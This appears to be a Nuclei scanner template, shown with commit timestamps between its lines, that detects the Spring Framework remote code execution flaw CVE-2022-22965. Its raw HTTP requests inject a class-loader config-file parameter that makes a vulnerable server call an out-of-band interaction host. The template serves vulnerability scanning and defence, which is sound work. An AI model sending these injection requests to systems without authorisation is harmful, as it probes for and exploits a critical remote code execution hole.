2022-04-01 11:43:45 +00:00
id : CVE-2022-22965
info :
2022-10-10 19:22:59 +00:00
name : Spring - Remote Code Execution
2022-04-01 11:43:45 +00:00
author : justmumu,arall,dhiyaneshDK,akincibor
severity : critical
2022-08-11 07:04:38 +00:00
description : |
2022-10-10 19:22:59 +00:00
Spring MVC and Spring WebFlux applications running on Java Development Kit 9+ are susceptible to remote code execution via data binding. It requires the application to run on Tomcat as a WAR deployment. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
2023-09-06 11:59:08 +00:00
remediation : If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to this exploit.
2022-04-01 11:43:45 +00:00
reference :
- https://tanzu.vmware.com/security/cve-2022-22965
- https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/
- https://twitter.com/RandoriAttack/status/1509298490106593283
2022-04-04 14:28:38 +00:00
- https://mp.weixin.qq.com/s/kgw-O4Hsd9r2vfme3Y2Ynw
- https://twitter.com/_0xf4n9x_/status/1509935429365100546
2022-05-20 21:38:52 +00:00
- https://nvd.nist.gov/vuln/detail/cve-2022-22965
2022-04-01 11:43:45 +00:00
classification :
2022-05-17 09:18:12 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-01 11:43:45 +00:00
cvss-score : 9.8
cve-id : CVE-2022-22965
2022-05-17 09:18:12 +00:00
cwe-id : CWE-94
2023-10-23 12:22:20 +00:00
epss-score : 0.97469
2023-10-29 11:57:59 +00:00
epss-percentile : 0.99956
2023-09-06 11:59:08 +00:00
cpe : cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 4
2023-07-11 19:49:27 +00:00
vendor : vmware
product : spring_framework
tags : cve,cve2022,rce,spring,injection,oast,intrusive,kev
2022-04-01 11:43:45 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-08-09 02:58:38 +00:00
- raw :
- |
POST {{BaseURL}} HTTP/1.1
Content-Type : application/x-www-form-urlencoded
2022-04-01 11:43:45 +00:00
2022-08-09 02:58:38 +00:00
class.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx
- |
GET /?class.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1
2022-08-11 07:04:38 +00:00
2022-08-09 02:58:38 +00:00
payloads :
interact_protocol :
2023-07-11 19:49:27 +00:00
- "http"
2022-08-09 02:58:38 +00:00
- https
2022-04-05 17:08:34 +00:00
2022-04-04 14:28:38 +00:00
matchers-condition : and
2022-04-01 11:43:45 +00:00
matchers :
2022-04-04 14:28:38 +00:00
- type : word
part : interactsh_protocol # Confirms the HTTP Interaction
words :
- "http"
- type : word
part : interactsh_request
words :
- "User-Agent: Java"
2022-08-11 07:04:38 +00:00
case-insensitive : true
2023-10-29 15:59:44 +00:00
# digest: 4b0a00483046022100c88c648ac75d943ab61ee2867b8939605b8f8431312d270ed824deb45e591a6f022100fabb0bddf50be6f2fdccd68bfacfb3877f456f19eaadfdd2ac51527c02a94886:922c64590222798bb761d5b6d8e72950